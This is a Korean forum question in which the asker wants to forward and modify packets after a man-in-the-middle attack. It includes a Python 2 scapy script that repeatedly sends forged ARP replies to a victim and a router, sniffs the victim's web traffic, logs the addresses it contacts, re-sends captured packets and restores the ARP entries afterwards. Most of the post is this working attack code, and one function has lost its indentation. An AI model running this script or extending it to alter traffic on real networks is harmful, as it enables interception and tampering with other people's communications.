python 중간자 공격에 따른 패킷 포워딩 구현
현재 파이썬으로 중간자 공격을 해보려고 합니다
중간자 공격을 해서 패킷을 훔치는 것까지는 성공했는데, 받은 패킷을 원래의 주소로 넘겨주는 방법을 잘 모르겠습니다.
물론 운영체제에서 지원하는 기능을 사용하면 된다는 것은 알고 있습니다 (예: sudo sysctl -w net.inet.ip.forwarding=1). 그러나 운영체제의 도움을 받으면 패킷을 수정해서 보낼 수 없었습니다.
저는 받은 패킷을 수정해서 보내주고 싶습니다. 어떻게 하면 구현할 수 있을까요?
혹시 도움이 될까 해서 소스코드도 올리도록 하겠습니다.
import subprocess
import os
import scapy.all
import time
import sys
import threading
# Victim address shared with the sniff callback pr(); main() replaces the '0' placeholder.
victim_ip='0'
# Peer IPs already written to test.txt; pr() appends to it and the __main__ guard reloads it from the file.
ips=[]
def select_victim():
    """Prompt on stdin for the two addresses the rest of the script works on.

    Returns:
        A ``(victim_ip, router_ip)`` tuple holding the operator's input
        exactly as typed; nothing is validated here.
    """
    # raw_input is the Python 2 built-in; each call blocks until a line is entered.
    target = raw_input('Input victim IP')
    gateway = raw_input('Input router IP')
    return target, gateway
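def getMac(host):
    """Look up the MAC address the local ARP cache holds for ``host``.

    Runs ``arp -a`` and reads each output line as space-separated fields,
    taking field 1 as the parenthesised IP and field 3 as the MAC. That is
    the layout this parser assumes; other ``arp`` output formats will simply
    not match.

    Args:
        host: IPv4 address as a string.

    Returns:
        The MAC string from the cache, or ``None`` when ``arp`` cannot be
        run, the host has no entry, or the entry is not resolved.
    """
    try:
        proc = subprocess.Popen(["arp", "-a"], stdout=subprocess.PIPE)
    except OSError:
        # No usable `arp` binary: report "not found" like any other miss.
        return None
    # communicate() drains and closes the pipe and reaps the child process.
    output = proc.communicate()[0]
    if not isinstance(output, str):
        # Python 3 hands back bytes; Python 2's str needs no decoding.
        output = output.decode('utf-8', 'replace')
    wanted = '(' + host + ')'
    for line in output.split('\n'):
        fields = line.split(' ')
        if len(fields) < 4:
            continue
        # Exact comparison: a substring test lets '10.0.0.1' match the entry
        # for '10.0.0.10' and hand back a different host's MAC, which would
        # then be used against (or "restored" for) the wrong machine.
        if fields[1] != wanted:
            continue
        if ':' not in fields[3]:
            # Unresolved entries carry a placeholder instead of a MAC.
            continue
        return fields[3]
    return None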
def attack(victim_ip, router_ip):
    """Send one forged ARP reply to the victim and one to the router.

    Each reply (``op=2``) names the other party's IP as ``psrc`` and leaves
    ``hwsrc`` unset, so scapy's default for that field (the sending
    interface's MAC) is used. The replies are unsolicited and main() repeats
    them every two seconds; that cadence, and one MAC answering for two IPs,
    is what ARP monitoring and switch-side Dynamic ARP Inspection are built
    to catch.
    """
    victim_hw = getMac(victim_ip)
    router_hw = getMac(router_ip)
    forged = (
        scapy.all.ARP(op=2, pdst=victim_ip, psrc=router_ip, hwdst=victim_hw),
        scapy.all.ARP(op=2, pdst=router_ip, psrc=victim_ip, hwdst=router_hw),
    )
    for reply in forged:
        scapy.all.send(reply)
def recover(victim_ip, router_ip):
    """Advertise the genuine IP-to-MAC pairs again, three times each.

    Both replies carry the real owner's MAC in ``hwsrc`` (read from the local
    ARP cache through getMac) and the broadcast address in ``hwdst``.
    """
    broadcast = "ff:ff:ff:ff:ff:ff"
    victim_hw = getMac(victim_ip)
    router_hw = getMac(router_ip)
    corrections = (
        scapy.all.ARP(op=2, pdst=router_ip, psrc=victim_ip, hwdst=broadcast, hwsrc=victim_hw),
        scapy.all.ARP(op=2, pdst=victim_ip, psrc=router_ip, hwdst=broadcast, hwsrc=router_hw),
    )
    for reply in corrections:
        scapy.all.send(reply, count=3)
def pr(x):
# Per-packet callback that sniffing() hands to scapy's sniff().
# NOTE(review): this paste lost its indentation, so the nesting of the lines
# below cannot be read off the listing; in particular it is unclear whether
# x.show() and the sendp() call run for every packet or only inside the TCP
# branch. Confirm against the author's file.
try:
global victim_ip
global ips
print victim_ip
# test.txt is reopened in append mode on every call.
with open('test.txt', 'at') as f:
if x.haslayer(scapy.all.TCP):
# Only TCP traffic to or from ports 80 and 443 is considered.
if x['TCP'].sport == 80 or x['TCP'].dport == 80 or x['TCP'].sport == 443 or x['TCP'].dport == 443:
# Record each peer address of the victim once: in test.txt and in the
# in-memory ips list. These addresses are metadata that stays readable
# on-path even when the payload on 443 is encrypted.
if x['IP'].src == victim_ip and not(str(x['IP'].dst) in ips):
f.write(str(x['IP'].dst)+' ')
ips.append(str(x['IP'].dst))
elif x['IP'].dst == victim_ip and not (str(x['IP'].src) in ips):
f.write(str(x['IP'].src)+' ')
ips.append(str(x['IP'].src))
# Prints scapy's layer-by-layer dump of the packet to stdout.
x.show()
# Sends the captured packet object, unmodified, at layer 2 on interface 'en0'.
scapy.all.sendp(x, iface='en0')
# Every exception is printed and then dropped, so this callback never raises.
except Exception, err:
print err
pass
def sniffing():
    """Run scapy's capture loop with pr() as the per-packet callback.

    No interface, filter, count or timeout is passed, so scapy's defaults
    apply and the call does not return on its own.
    """
    handler = pr
    scapy.all.sniff(prn=handler)
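def main():
    """Drive one session: prompt, check the ARP cache, sniff, spoof, restore.

    Reads the two addresses from the operator, stops early when either has no
    entry in the local ARP cache, starts the capture thread, then calls
    attack() every two seconds until interrupted. recover() now runs on every
    way out of the loop, including Ctrl-C.
    """
    global victim_ip
    #if os.geteuid() != 0:
    #    sys.exit("[!] Please run as root")
    victim_ip, router_ip = select_victim()
    if getMac(router_ip) is None:
        print('We can not find router mac address')
        return
    if getMac(victim_ip) is None:
        print('we can not find victim mac address')
        return
    t = threading.Thread(target=sniffing)
    # sniffing() never returns, so a non-daemon thread would keep the
    # interpreter alive after exit() below.
    t.daemon = True
    t.start()
    try:
        while True:
            print('a')
            attack(victim_ip, router_ip)
            time.sleep(2)
    except KeyboardInterrupt:
        # Ctrl-C is not an Exception subclass; the original handler let it
        # escape and skipped recover() entirely.
        pass
    except Exception as err:
        print(err)
    finally:
        # Always put the genuine mappings back; otherwise both hosts keep the
        # forged ARP entries until those entries age out.
        recover(victim_ip, router_ip)
    t.join(10)
    exit()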
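if __name__ == '__main__':
    # Reload the peer IPs recorded by an earlier run so pr() does not log
    # them a second time.
    try:
        with open('test.txt', 'rt') as f:
            # Drop the empty string left by the trailing separator.
            ips = [entry for entry in f.read().split(' ') if entry]
    except IOError:
        # First run: test.txt does not exist until pr() appends to it.
        ips = []
    main()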